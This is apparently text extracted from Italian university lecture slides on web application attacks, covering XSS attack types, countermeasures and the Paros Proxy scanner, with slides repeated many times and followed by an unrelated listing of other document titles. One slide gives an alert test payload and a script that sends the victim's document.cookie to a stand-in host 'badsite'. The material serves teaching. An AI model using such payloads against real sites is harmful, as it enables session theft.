64 Cross-Site Scripting Attacchi XSS XSS: possibili attacchi Attacchi di cross-site scripting: Accesso ai cookie di sessione della vittima; Accesso alla cronologia con attacchi brute-force basati su proprietà contenute nel DOM; Accesso alla intranet: Tramite link ad-hoc l utente esegue uno script che ne cattura l IP interno; L attaccante può accedere da remoto tramite l IP, alla rete interna; Identifica i web server attivi nella intranet col test su IP dinamici nel range d indirizzi privati; Accede ad informazioni riservate o ai dispositivi di rete come firewall, router, etc. Simona Ullo (UniCT) Attacchi alle applicazioni web 18 / 25

65 Cross-Site Scripting Attacchi XSS XSS: possibili attacchi Attacchi di cross-site scripting: Accesso ai cookie di sessione della vittima; Accesso alla cronologia con attacchi brute-force basati su proprietà contenute nel DOM; Accesso alla intranet: Tramite link ad-hoc l utente esegue uno script che ne cattura l IP interno; L attaccante può accedere da remoto tramite l IP, alla rete interna; Identifica i web server attivi nella intranet col test su IP dinamici nel range d indirizzi privati; Accede ad informazioni riservate o ai dispositivi di rete come firewall, router, etc. Simona Ullo (UniCT) Attacchi alle applicazioni web 18 / 25

66 Cross-Site Scripting Attacchi XSS XSS: possibili attacchi Attacchi di cross-site scripting: Accesso ai cookie di sessione della vittima; Accesso alla cronologia con attacchi brute-force basati su proprietà contenute nel DOM; Accesso alla intranet: Tramite link ad-hoc l utente esegue uno script che ne cattura l IP interno; L attaccante può accedere da remoto tramite l IP, alla rete interna; Identifica i web server attivi nella intranet col test su IP dinamici nel range d indirizzi privati; Accede ad informazioni riservate o ai dispositivi di rete come firewall, router, etc. Simona Ullo (UniCT) Attacchi alle applicazioni web 18 / 25

67 Cross-Site Scripting Attacchi XSS XSS: possibili attacchi Attacchi di cross-site scripting: Accesso ai cookie di sessione della vittima; Accesso alla cronologia con attacchi brute-force basati su proprietà contenute nel DOM; Accesso alla intranet: Tramite link ad-hoc l utente esegue uno script che ne cattura l IP interno; L attaccante può accedere da remoto tramite l IP, alla rete interna; Identifica i web server attivi nella intranet col test su IP dinamici nel range d indirizzi privati; Accede ad informazioni riservate o ai dispositivi di rete come firewall, router, etc. Simona Ullo (UniCT) Attacchi alle applicazioni web 18 / 25

68 Cross-Site Scripting Attacchi XSS XSS: possibili attacchi Attacchi di cross-site scripting: Accesso ai cookie di sessione della vittima; Accesso alla cronologia con attacchi brute-force basati su proprietà contenute nel DOM; Accesso alla intranet: Tramite link ad-hoc l utente esegue uno script che ne cattura l IP interno; L attaccante può accedere da remoto tramite l IP, alla rete interna; Identifica i web server attivi nella intranet col test su IP dinamici nel range d indirizzi privati; Accede ad informazioni riservate o ai dispositivi di rete come firewall, router, etc. Simona Ullo (UniCT) Attacchi alle applicazioni web 18 / 25

69 Cross-Site Scripting Tecniche di protezione da attacchi XSS XSS: Contromisure Per evitare attacchi XSS... Protezione lato server: input sanitizing e input blocking. Attenzione: molti server sono vulnerabili ad XSS! Protezione lato client: Il browser è fatto in modo da eseguire richieste: non sa distinguere un attacco! Scelta di un browser più sicuro ; Rendere sicuro il browser: plug-in anti-phishing, controllo script, protezione di cronologia e cache, etc. Rendere sicuro il browser: disabilitare caratteristiche pericolose (JavaScript, ActiveX, etc.) ed abilitarle all occorrenza. Per XSS non persistente: attenzione agli URL non fidati! Simona Ullo (UniCT) Attacchi alle applicazioni web 19 / 25

70 Cross-Site Scripting Tecniche di protezione da attacchi XSS XSS: Contromisure Per evitare attacchi XSS... Protezione lato server: input sanitizing e input blocking. Attenzione: molti server sono vulnerabili ad XSS! Protezione lato client: Il browser è fatto in modo da eseguire richieste: non sa distinguere un attacco! Scelta di un browser più sicuro ; Rendere sicuro il browser: plug-in anti-phishing, controllo script, protezione di cronologia e cache, etc. Rendere sicuro il browser: disabilitare caratteristiche pericolose (JavaScript, ActiveX, etc.) ed abilitarle all occorrenza. Per XSS non persistente: attenzione agli URL non fidati! Simona Ullo (UniCT) Attacchi alle applicazioni web 19 / 25

71 Cross-Site Scripting Tecniche di protezione da attacchi XSS XSS: Contromisure Per evitare attacchi XSS... Protezione lato server: input sanitizing e input blocking. Attenzione: molti server sono vulnerabili ad XSS! Protezione lato client: Il browser è fatto in modo da eseguire richieste: non sa distinguere un attacco! Scelta di un browser più sicuro ; Rendere sicuro il browser: plug-in anti-phishing, controllo script, protezione di cronologia e cache, etc. Rendere sicuro il browser: disabilitare caratteristiche pericolose (JavaScript, ActiveX, etc.) ed abilitarle all occorrenza. Per XSS non persistente: attenzione agli URL non fidati! Simona Ullo (UniCT) Attacchi alle applicazioni web 19 / 25

72 Cross-Site Scripting Tecniche di protezione da attacchi XSS XSS: Contromisure Per evitare attacchi XSS... Protezione lato server: input sanitizing e input blocking. Attenzione: molti server sono vulnerabili ad XSS! Protezione lato client: Il browser è fatto in modo da eseguire richieste: non sa distinguere un attacco! Scelta di un browser più sicuro ; Rendere sicuro il browser: plug-in anti-phishing, controllo script, protezione di cronologia e cache, etc. Rendere sicuro il browser: disabilitare caratteristiche pericolose (JavaScript, ActiveX, etc.) ed abilitarle all occorrenza. Per XSS non persistente: attenzione agli URL non fidati! Simona Ullo (UniCT) Attacchi alle applicazioni web 19 / 25

73 Cross-Site Scripting Tecniche di protezione da attacchi XSS XSS: Contromisure Per evitare attacchi XSS... Protezione lato server: input sanitizing e input blocking. Attenzione: molti server sono vulnerabili ad XSS! Protezione lato client: Il browser è fatto in modo da eseguire richieste: non sa distinguere un attacco! Scelta di un browser più sicuro ; Rendere sicuro il browser: plug-in anti-phishing, controllo script, protezione di cronologia e cache, etc. Rendere sicuro il browser: disabilitare caratteristiche pericolose (JavaScript, ActiveX, etc.) ed abilitarle all occorrenza. Per XSS non persistente: attenzione agli URL non fidati! Simona Ullo (UniCT) Attacchi alle applicazioni web 19 / 25

74 Cross-Site Scripting Tecniche di protezione da attacchi XSS XSS: Contromisure Per evitare attacchi XSS... Protezione lato server: input sanitizing e input blocking. Attenzione: molti server sono vulnerabili ad XSS! Protezione lato client: Il browser è fatto in modo da eseguire richieste: non sa distinguere un attacco! Scelta di un browser più sicuro ; Rendere sicuro il browser: plug-in anti-phishing, controllo script, protezione di cronologia e cache, etc. Rendere sicuro il browser: disabilitare caratteristiche pericolose (JavaScript, ActiveX, etc.) ed abilitarle all occorrenza. Per XSS non persistente: attenzione agli URL non fidati! Simona Ullo (UniCT) Attacchi alle applicazioni web 19 / 25

75 Cross-Site Scripting Tecniche di protezione da attacchi XSS XSS: Contromisure Per evitare attacchi XSS... Protezione lato server: input sanitizing e input blocking. Attenzione: molti server sono vulnerabili ad XSS! Protezione lato client: Il browser è fatto in modo da eseguire richieste: non sa distinguere un attacco! Scelta di un browser più sicuro ; Rendere sicuro il browser: plug-in anti-phishing, controllo script, protezione di cronologia e cache, etc. Rendere sicuro il browser: disabilitare caratteristiche pericolose (JavaScript, ActiveX, etc.) ed abilitarle all occorrenza. Per XSS non persistente: attenzione agli URL non fidati! Simona Ullo (UniCT) Attacchi alle applicazioni web 19 / 25

76 Cross-Site Scripting Tecniche di protezione da attacchi XSS XSS: Contromisure Per evitare attacchi XSS... Protezione lato server: input sanitizing e input blocking. Attenzione: molti server sono vulnerabili ad XSS! Protezione lato client: Il browser è fatto in modo da eseguire richieste: non sa distinguere un attacco! Scelta di un browser più sicuro ; Rendere sicuro il browser: plug-in anti-phishing, controllo script, protezione di cronologia e cache, etc. Rendere sicuro il browser: disabilitare caratteristiche pericolose (JavaScript, ActiveX, etc.) ed abilitarle all occorrenza. Per XSS non persistente: attenzione agli URL non fidati! Simona Ullo (UniCT) Attacchi alle applicazioni web 19 / 25

77 Cross-Site Scripting Esempi di attacchi XSS Qualche esempio di attacco XSS Test di vulnerabilità con messaggio di alert (XSS non persistente in un form di ricerca) <FORM action = \http://www.libreria.it/carrello.php "> <INPUT type = \text " name = \search " value = \"> <script> alert( XSS%20Test ) </script> <INPUT type = \submit " value = \Submit "> </FORM> Accesso ai cookies di sessione (XSS persistente in un forum) ><script language = \javascript "> document.location.href = \http://badsite/bad-script.php? value = " + document.cookie; </script> Simona Ullo (UniCT) Attacchi alle applicazioni web 20 / 25

78 Cross-Site Scripting Esempi di attacchi XSS Qualche esempio di attacco XSS Test di vulnerabilità con messaggio di alert (XSS non persistente in un form di ricerca) <FORM action = \http://www.libreria.it/carrello.php "> <INPUT type = \text " name = \search " value = \"> <script> alert( XSS%20Test ) </script> <INPUT type = \submit " value = \Submit "> </FORM> Accesso ai cookies di sessione (XSS persistente in un forum) ><script language = \javascript "> document.location.href = \http://badsite/bad-script.php? value = " + document.cookie; </script> Simona Ullo (UniCT) Attacchi alle applicazioni web 20 / 25

79 Paros Proxy Cos è Paros? Verifica delle vulnerabilità Paros Proxy Simona Ullo (UniCT) Attacchi alle applicazioni web 21 / 25

80 Paros Proxy Cos è Paros? Paros Proxy: un esempio di pen tester Paros Proxy è... Software freeware e opensource sviluppato in Java; Server proxy che può essere configurato per filtrare tutto il traffico HTTP/HTTPS in una comunicazione client/server; Utilizzato per l analisi della sicurezza nelle applicazioni web; Varie funzionalità tra cui vulnerability scanner per SQL injection e Cross-site scripting. Simona Ullo (UniCT) Attacchi alle applicazioni web 22 / 25

81 Paros Proxy Cos è Paros? Paros Proxy: un esempio di pen tester Paros Proxy è... Software freeware e opensource sviluppato in Java; Server proxy che può essere configurato per filtrare tutto il traffico HTTP/HTTPS in una comunicazione client/server; Utilizzato per l analisi della sicurezza nelle applicazioni web; Varie funzionalità tra cui vulnerability scanner per SQL injection e Cross-site scripting. Simona Ullo (UniCT) Attacchi alle applicazioni web 22 / 25

82 Paros Proxy Cos è Paros? Paros Proxy: un esempio di pen tester Paros Proxy è... Software freeware e opensource sviluppato in Java; Server proxy che può essere configurato per filtrare tutto il traffico HTTP/HTTPS in una comunicazione client/server; Utilizzato per l analisi della sicurezza nelle applicazioni web; Varie funzionalità tra cui vulnerability scanner per SQL injection e Cross-site scripting. Simona Ullo (UniCT) Attacchi alle applicazioni web 22 / 25

83 Paros Proxy Cos è Paros? Paros Proxy: un esempio di pen tester Paros Proxy è... Software freeware e opensource sviluppato in Java; Server proxy che può essere configurato per filtrare tutto il traffico HTTP/HTTPS in una comunicazione client/server; Utilizzato per l analisi della sicurezza nelle applicazioni web; Varie funzionalità tra cui vulnerability scanner per SQL injection e Cross-site scripting. Simona Ullo (UniCT) Attacchi alle applicazioni web 22 / 25

84 Paros Proxy Un esempio di scansione con Paros Scansione con Paros Per avviare una scansione bisogna: Configurare il browser per la connessione al proxy alla porta 8080 (traffico HTTP); Navigare le pagine del sito che devono essere analizzate; Settare le politiche di scansione (quali vulnerabilità testare); Avviare la scansione e visionare i risultati in formato HTML. Simona Ullo (UniCT) Attacchi alle applicazioni web 23 / 25

85 Paros Proxy Un esempio di scansione con Paros Scansione con Paros Per avviare una scansione bisogna: Configurare il browser per la connessione al proxy alla porta 8080 (traffico HTTP); Navigare le pagine del sito che devono essere analizzate; Settare le politiche di scansione (quali vulnerabilità testare); Avviare la scansione e visionare i risultati in formato HTML. Simona Ullo (UniCT) Attacchi alle applicazioni web 23 / 25

86 Paros Proxy Un esempio di scansione con Paros Scansione con Paros Per avviare una scansione bisogna: Configurare il browser per la connessione al proxy alla porta 8080 (traffico HTTP); Navigare le pagine del sito che devono essere analizzate; Settare le politiche di scansione (quali vulnerabilità testare); Avviare la scansione e visionare i risultati in formato HTML. Simona Ullo (UniCT) Attacchi alle applicazioni web 23 / 25

87 Paros Proxy Un esempio di scansione con Paros Scansione con Paros Per avviare una scansione bisogna: Configurare il browser per la connessione al proxy alla porta 8080 (traffico HTTP); Navigare le pagine del sito che devono essere analizzate; Settare le politiche di scansione (quali vulnerabilità testare); Avviare la scansione e visionare i risultati in formato HTML. Simona Ullo (UniCT) Attacchi alle applicazioni web 23 / 25

88 Paros Proxy Risultati della scansione Un esempio di scansione con Paros Esempio di report prodotto da Paros in seguito ad una scansione per vulnerabilità di SQL injection: Simona Ullo (UniCT) Attacchi alle applicazioni web 24 / 25

89 Paros Proxy Risultati della scansione Un esempio di scansione con Paros Esempio di report prodotto da Paros in seguito ad una scansione per vulnerabilità XSS: Simona Ullo (UniCT) Attacchi alle applicazioni web 25 / 25

PHP: form, cookies, sessioni e. Pasqualetti Veronica

PHP: form, cookies, sessioni e. Pasqualetti Veronica PHP: form, cookies, sessioni e mysql Pasqualetti Veronica Form HTML: sintassi dei form 2 Un form HTML è una finestra contenente vari elementi di controllo che consentono al visitatore di inserire informazioni.

Dettagli

Lezione n 1! Introduzione"

Lezione n 1! Introduzione Lezione n 1! Introduzione" Corso sui linguaggi del web" Fondamentali del web" Fondamentali di una gestione FTP" Nomenclatura di base del linguaggio del web" Come funziona la rete internet?" Connessione"

Dettagli

DBMS (Data Base Management System)

DBMS (Data Base Management System) Cos'è un Database I database o banche dati o base dati sono collezioni di dati, tra loro correlati, utilizzati per rappresentare una porzione del mondo reale. Sono strutturati in modo tale da consentire

Dettagli

Come difendersi dai VIRUS

Come difendersi dai VIRUS Come difendersi dai VIRUS DEFINIZIONE Un virus è un programma, cioè una serie di istruzioni, scritte in un linguaggio di programmazione, in passato era di solito di basso livello*, mentre con l'avvento

Dettagli

FileMaker Server 12. Guida introduttiva

FileMaker Server 12. Guida introduttiva FileMaker Server 12 Guida introduttiva 2007 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker e Bento sono marchi di FileMaker,

Dettagli

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software. Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere

Dettagli

FileMaker Server 13. Pubblicazione Web personalizzata con PHP

FileMaker Server 13. Pubblicazione Web personalizzata con PHP FileMaker Server 13 Pubblicazione Web personalizzata con PHP 2007-2013 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 Stati Uniti FileMaker

Dettagli

Le Reti Informatiche

Le Reti Informatiche Le Reti Informatiche modulo 10 Prof. Salvatore Rosta www.byteman.it s.rosta@byteman.it 1 Nomenclatura: 1 La rappresentazione di uno schema richiede una serie di abbreviazioni per i vari componenti. Seguiremo

Dettagli

SQL Injection: le tecniche, i tool ed esempi pratici OWASP. The OWASP Foundation

SQL Injection: le tecniche, i tool ed esempi pratici OWASP. The OWASP Foundation SQL Injection: le tecniche, i tool ed esempi pratici SMAU E- Academy 2006 Antonio Parata collaboratore -Italy http://www.ictsc.it antonio.parata@ictsc.it http://www.owasp.org/index.php/italy Copyright

Dettagli

Basi di Dati prof. Letizia Tanca lucidi ispirati al libro Atzeni-Ceri-Paraboschi-Torlone. SQL: il DDL

Basi di Dati prof. Letizia Tanca lucidi ispirati al libro Atzeni-Ceri-Paraboschi-Torlone. SQL: il DDL Basi di Dati prof. Letizia Tanca lucidi ispirati al libro Atzeni-Ceri-Paraboschi-Torlone SQL: il DDL Parti del linguaggio SQL Definizione di basi di dati (Data Definition Language DDL) Linguaggio per modificare

Dettagli

Standard di Sicurezza sui Dati previsti dai Circuiti Internazionali. Payment Card Industry Data Security Standard

Standard di Sicurezza sui Dati previsti dai Circuiti Internazionali. Payment Card Industry Data Security Standard Standard di Sicurezza sui Dati previsti dai Circuiti Internazionali Payment Card Industry Data Security Standard STANDARD DI SICUREZZA SUI DATI PREVISTI DAI CIRCUITI INTERNAZIONALI (Payment Card Industry

Dettagli

APPLICAZIONE WEB PER LA GESTIONE DELLE RICHIESTE DI ACQUISTO DEL MATERIALE INFORMATICO. Francesco Marchione e Dario Richichi

APPLICAZIONE WEB PER LA GESTIONE DELLE RICHIESTE DI ACQUISTO DEL MATERIALE INFORMATICO. Francesco Marchione e Dario Richichi APPLICAZIONE WEB PER LA GESTIONE DELLE RICHIESTE DI ACQUISTO DEL MATERIALE INFORMATICO Francesco Marchione e Dario Richichi Istituto Nazionale di Geofisica e Vulcanologia Sezione di Palermo Indice Introduzione...

Dettagli

Manuale di configurazione per iphone

Manuale di configurazione per iphone Manuale di configurazione per iphone Notariato.it e.net (Iphone 2G e 3G) 2 PREMESSA Il presente manuale ha lo scopo di fornire le indicazioni per la configurazione del terminale IPhone 2G e 3G per ricevere

Dettagli

Come installare e configurare il software FileZilla

Come installare e configurare il software FileZilla Come utilizzare FileZilla per accedere ad un server FTP Con questo tutorial verrà mostrato come installare, configurare il software e accedere ad un server FTP, come ad esempio quello dedicato ai siti

Dettagli

Payment Card Industry (PCI) Data Security Standard

Payment Card Industry (PCI) Data Security Standard Payment Card Industry (PCI) Data Security Standard Procedure per la scansione di sicurezza Versione 1.1 Release: settembre 2006 Indice generale Finalità... 1 Introduzione... 1 Ambito di applicazione dei

Dettagli

Guida ai Servizi Internet per il Referente Aziendale

Guida ai Servizi Internet per il Referente Aziendale Guida ai Servizi Internet per il Referente Aziendale Indice Indice Introduzione...3 Guida al primo accesso...3 Accessi successivi...5 Amministrazione dei servizi avanzati (VAS)...6 Attivazione dei VAS...7

Dettagli

Un client su arduino invia i dati acquisiti ad un database

Un client su arduino invia i dati acquisiti ad un database Un client su arduino invia i dati acquisiti ad un database PROBLEMA Si vogliono inviare, periodicamente, i dati acquisiti da alcuni sensori ad un database presente su di un server. Arduino con shield Ethernet

Dettagli

Procedura accesso e gestione Posta Certificata OlimonTel PEC

Procedura accesso e gestione Posta Certificata OlimonTel PEC Procedura accesso e gestione Posta Certificata OlimonTel PEC Informazioni sul documento Revisioni 06/06/2011 Andrea De Bruno V 1.0 1 Scopo del documento Scopo del presente documento è quello di illustrare

Dettagli

Informatica per la comunicazione" - lezione 9 -

Informatica per la comunicazione - lezione 9 - Informatica per la comunicazione" - lezione 9 - Protocolli di livello intermedio:" TCP/IP" IP: Internet Protocol" E il protocollo che viene seguito per trasmettere un pacchetto da un host a un altro, in

Dettagli

Guida alla scansione su FTP

Guida alla scansione su FTP Guida alla scansione su FTP Per ottenere informazioni di base sulla rete e sulle funzionalità di rete avanzate della macchina Brother, consultare la uu Guida dell'utente in rete. Per ottenere informazioni

Dettagli

FileMaker Server 13. Guida introduttiva

FileMaker Server 13. Guida introduttiva FileMaker Server 13 Guida introduttiva 2007-2013 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 Stati Uniti FileMaker e Bento sono marchi

Dettagli

Programma Servizi Centralizzati s.r.l.

Programma Servizi Centralizzati s.r.l. Via Privata Maria Teresa, 11-20123 Milano Partita IVA 09986990159 Casella di Posta Certificata pecplus.it N.B. si consiglia di cambiare la password iniziale assegnata dal sistema alla creazione della casella

Dettagli

Lezione III: Oggetti ASP e interazione tramite form HTML

Lezione III: Oggetti ASP e interazione tramite form HTML Lezione III: Oggetti ASP e interazione tramite form HTML La terza lezione, come le precedenti, ha avuto una durata di due ore, di cui una in aula e l altra in laboratorio, si è tenuta alla presenza della

Dettagli

La gestione documentale con il programma Filenet ed il suo utilizzo tramite la tecnologia.net. di Emanuele Mattei (emanuele.mattei[at]email.

La gestione documentale con il programma Filenet ed il suo utilizzo tramite la tecnologia.net. di Emanuele Mattei (emanuele.mattei[at]email. La gestione documentale con il programma Filenet ed il suo utilizzo tramite la tecnologia.net di Emanuele Mattei (emanuele.mattei[at]email.it) Introduzione In questa serie di articoli, vedremo come utilizzare

Dettagli

Sistemi Web-Based - Terminologia. Progetto di Sistemi Web-Based Prof. Luigi Laura, Univ. Tor Vergata, a.a. 2010/2011

Sistemi Web-Based - Terminologia. Progetto di Sistemi Web-Based Prof. Luigi Laura, Univ. Tor Vergata, a.a. 2010/2011 Sistemi Web-Based - Terminologia Progetto di Sistemi Web-Based Prof. Luigi Laura, Univ. Tor Vergata, a.a. 2010/2011 CLIENT: il client è il programma che richiede un servizio a un computer collegato in

Dettagli

RefWorks Guida all utente Versione 4.0

RefWorks Guida all utente Versione 4.0 Accesso a RefWorks per utenti registrati RefWorks Guida all utente Versione 4.0 Dalla pagina web www.refworks.com/refworks Inserire il proprio username (indirizzo e-mail) e password NB: Agli utenti remoti

Dettagli

Iphone e Zimbra 7 FOSS Edition: Mail, Contatti ed Agenda

Iphone e Zimbra 7 FOSS Edition: Mail, Contatti ed Agenda Iphone e Zimbra 7 FOSS Edition: Mail, Contatti ed Agenda mailto:beable@beable.it http://www.beable.it 1 / 33 Questo tutorial è rilasciato con la licenza Creative Commons Attribuzione-Non commerciale-non

Dettagli

CORSO DI ALGORITMI E PROGRAMMAZIONE. JDBC Java DataBase Connectivity

CORSO DI ALGORITMI E PROGRAMMAZIONE. JDBC Java DataBase Connectivity CORSO DI ALGORITMI E PROGRAMMAZIONE JDBC Java DataBase Connectivity Anno Accademico 2002-2003 Accesso remoto al DB Istruzioni SQL Rete DataBase Utente Host client Server di DataBase Host server Accesso

Dettagli

Firma Digitale Remota. Manuale di Attivazione, Installazione,Utilizzo

Firma Digitale Remota. Manuale di Attivazione, Installazione,Utilizzo Firma Digitale Remota Manuale di Attivazione, Installazione,Utilizzo Versione: 0.3 Aggiornata al: 02.07.2012 Sommario 1. Attivazione Firma Remota... 3 1.1 Attivazione Firma Remota con Token YUBICO... 5

Dettagli

SMS API. Documentazione Tecnica YouSMS SOAP API. YouSMS Evet Limited 2015 http://www.yousms.it

SMS API. Documentazione Tecnica YouSMS SOAP API. YouSMS Evet Limited 2015 http://www.yousms.it SMS API Documentazione Tecnica YouSMS SOAP API YouSMS Evet Limited 2015 http://www.yousms.it INDICE DEI CONTENUTI Introduzione... 2 Autenticazione & Sicurezza... 2 Username e Password... 2 Connessione

Dettagli

Basi di Dati. S Q L Lezione 5

Basi di Dati. S Q L Lezione 5 Basi di Dati S Q L Lezione 5 Antonio Virdis a.virdis@iet.unipi.it Sommario Gestione eventi Gestione dei privilegi Query Complesse 2 Esercizio 9 (lezione 4) Indicare nome e cognome, spesa e reddito annuali

Dettagli

Mettere in sicurezza l infrastruttura dei desktop virtuali con Citrix NetScaler

Mettere in sicurezza l infrastruttura dei desktop virtuali con Citrix NetScaler Mettere in sicurezza l infrastruttura dei desktop virtuali con Citrix NetScaler 2 Le aziende attuali stanno adottando rapidamente la virtualizzazione desktop quale mezzo per ridurre i costi operativi,

Dettagli

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a:

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a: Lab 4.1 Utilizzare FTP (File Tranfer Protocol) LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) In questa lezione imparerete a: Utilizzare altri servizi Internet, Collegarsi al servizio Telnet, Accedere

Dettagli

Come configurare un programma di posta con l account PEC di GLOBALCERT.IT

Come configurare un programma di posta con l account PEC di GLOBALCERT.IT Come configurare un programma di posta con l account PEC di GLOBALCERT.IT Il Titolare di una nuova casella PEC può accedere al sistema sia tramite Web (Webmail i ), sia configurando il proprio account

Dettagli

FileMaker Server 13. Guida di FileMaker Server

FileMaker Server 13. Guida di FileMaker Server FileMaker Server 13 Guida di FileMaker Server 2010-2013 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 Stati Uniti FileMaker e Bento sono

Dettagli

Servizi DNS - SMTP FTP - TELNET. Programmi. Outlook Express Internet Explorer

Servizi DNS - SMTP FTP - TELNET. Programmi. Outlook Express Internet Explorer Servizi DNS - SMTP FTP - TELNET Programmi Outlook Express Internet Explorer 72 DNS Poiché riferirsi a una risorsa (sia essa un host oppure l'indirizzo di posta elettronica di un utente) utilizzando un

Dettagli

Windows Mail Outlook Express 6 Microsoft Outlook 2003 Microsoft Outlook 2007 Thunderbird Opera Mail Mac Mail

Windows Mail Outlook Express 6 Microsoft Outlook 2003 Microsoft Outlook 2007 Thunderbird Opera Mail Mac Mail Configurare un programma di posta con l account PEC di Il Titolare di una nuova casella PEC può accedere al sistema sia tramite Web (Webmail i ), sia configurando il proprio account ii nel programma di

Dettagli

Appunti di Antonio Bernardo

Appunti di Antonio Bernardo Internet Appunti di Antonio Bernardo Cos è Internet Internet può essere vista come una rete logica di enorme complessità, appoggiata a strutture fisiche e collegamenti di vario tipo (fibre ottiche, cavi

Dettagli

Invio della domanda on line ai sensi dell art. 12 dell avviso pubblico quadro 2013. Regole tecniche e modalità di svolgimento

Invio della domanda on line ai sensi dell art. 12 dell avviso pubblico quadro 2013. Regole tecniche e modalità di svolgimento INCENTIVI ALLE IMPRESE PER LA REALIZZAZIONE DI INTERVENTI IN MATERIA DI SALUTE E SICUREZZA SUL LAVORO art. 11, comma 1 lett. a) e comma 5 del D.Lgs. 81/2008 e s.m.i. Invio della domanda on line ai sensi

Dettagli

12.5 UDP (User Datagram Protocol)

12.5 UDP (User Datagram Protocol) CAPITOLO 12. SUITE DI PROTOCOLLI TCP/IP 88 12.5 UDP (User Datagram Protocol) L UDP (User Datagram Protocol) é uno dei due protocolli del livello di trasporto. Come l IP, é un protocollo inaffidabile, che

Dettagli

Internet Internet è universalmente nota come la Rete delle reti: un insieme smisurato di computer collegati tra loro per scambiarsi dati e servizi.

Internet Internet è universalmente nota come la Rete delle reti: un insieme smisurato di computer collegati tra loro per scambiarsi dati e servizi. Internet Internet è universalmente nota come la Rete delle reti: un insieme smisurato di computer collegati tra loro per scambiarsi dati e servizi. Internet: la rete delle reti Alberto Ferrari Connessioni

Dettagli

Esiste la versione per Linux di GeCo? Allo stato attuale non è prevista la distribuzione di una versione di GeCo per Linux.

Esiste la versione per Linux di GeCo? Allo stato attuale non è prevista la distribuzione di una versione di GeCo per Linux. FAQ su GeCo Qual è la differenza tra la versione di GeCo con installer e quella portabile?... 2 Esiste la versione per Linux di GeCo?... 2 Quali sono le credenziali di accesso a GeCo?... 2 Ho smarrito

Dettagli

INFORMATIVA PRIVACY AI VISITATORI DEL SITO www.wdc-international.com

INFORMATIVA PRIVACY AI VISITATORI DEL SITO www.wdc-international.com INFORMATIVA PRIVACY AI VISITATORI DEL SITO www.wdc-international.com La presente Informativa è resa, anche ai sensi del ai sensi del Data Protection Act 1998, ai visitatori (i Visitatori ) del sito Internet

Dettagli

Database, SQL & MySQL. Dott. Paolo PAVAN Maggio 2002

Database, SQL & MySQL. Dott. Paolo PAVAN Maggio 2002 Database, SQL & MySQL Dott. Paolo PAVAN Maggio 2002 1 Struttura RDBMS MYSQL - RDBMS DATABASE TABELLE 2 Introduzione ai DATABASE Database Indica in genere un insieme di dati rivolti alla rappresentazione

Dettagli

ARP (Address Resolution Protocol)

ARP (Address Resolution Protocol) ARP (Address Resolution Protocol) Il routing Indirizzo IP della stazione mittente conosce: - il proprio indirizzo (IP e MAC) - la netmask (cioè la subnet) - l indirizzo IP del default gateway, il router

Dettagli

Outlook Express 6 Microsoft Internet Explorer, Avvio del programma Creare un nuovo account

Outlook Express 6 Microsoft Internet Explorer, Avvio del programma Creare un nuovo account Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica. È gratuito, semplice da utilizzare e fornisce

Dettagli

CONFIGURAZIONE DEI SERVIZI (seconda parte)

CONFIGURAZIONE DEI SERVIZI (seconda parte) Corso ForTIC C2 LEZIONE n. 10 CONFIGURAZIONE DEI SERVIZI (seconda parte) WEB SERVER PROXY FIREWALL Strumenti di controllo della rete I contenuti di questo documento, salvo diversa indicazione, sono rilasciati

Dettagli

Dal punto di vista organizzativo sono possibili due soluzioni per il sistema di rete.

Dal punto di vista organizzativo sono possibili due soluzioni per il sistema di rete. Premessa. La traccia di questo anno integra richieste che possono essere ricondotte a due tipi di prove, informatica sistemi, senza lasciare spazio ad opzioni facoltative. Alcuni quesiti vanno oltre le

Dettagli

Introduzione a MySQL

Introduzione a MySQL Introduzione a MySQL Cinzia Cappiello Alessandro Raffio Politecnico di Milano Prima di iniziare qualche dettaglio su MySQL MySQL è un sistema di gestione di basi di dati relazionali (RDBMS) composto da

Dettagli

Funzioni nuove e modificate

Funzioni nuove e modificate Gigaset S675 IP, S685 IP, C470 IP, C475 IP: Funzioni nuove e modificate Questo documento integra il manuale di istruzioni dei telefoni VoIP Gigaset: Gigaset C470 IP, Gigaset C475 IP, Gigaset S675 IP e

Dettagli

Parallels Plesk Panel

Parallels Plesk Panel Parallels Plesk Panel Notifica sul Copyright ISBN: N/A Parallels 660 SW 39 th Street Suite 205 Renton, Washington 98057 USA Telefono: +1 (425) 282 6400 Fax: +1 (425) 282 6444 Copyright 1999-2009, Parallels,

Dettagli

ASTA IN GRIGLIA PRO. COSA PERMETTE DI FARE (per ora) Asta In Griglia PRO:

ASTA IN GRIGLIA PRO. COSA PERMETTE DI FARE (per ora) Asta In Griglia PRO: ASTA IN GRIGLIA PRO Asta in Griglia PRO è un software creato per aiutare il venditore Ebay nella fase di post-vendita, da quando l inserzione finisce con una vendita fino alla spedizione. Il programma

Dettagli

Risoluzione Problemi Chiavetta Internet Veloce MOMODESIGN MD-@

Risoluzione Problemi Chiavetta Internet Veloce MOMODESIGN MD-@ Risoluzione Problemi Chiavetta Internet Veloce MOMODESIGN MD-@ Installazione Modem USB Momo Gestione segnale di rete Connessione Internet Messaggi di errore "Impossibile visualizzare la pagina" o "Pagina

Dettagli

Accesso alle risorse elettroniche SiBA da reti esterne

Accesso alle risorse elettroniche SiBA da reti esterne Accesso alle risorse elettroniche SiBA da reti esterne Chi può accedere? Il servizio è riservato a tutti gli utenti istituzionali provvisti di account di posta elettronica d'ateneo nel formato nome.cognome@uninsubria.it

Dettagli

TeamPortal. Servizi integrati con ambienti Gestionali

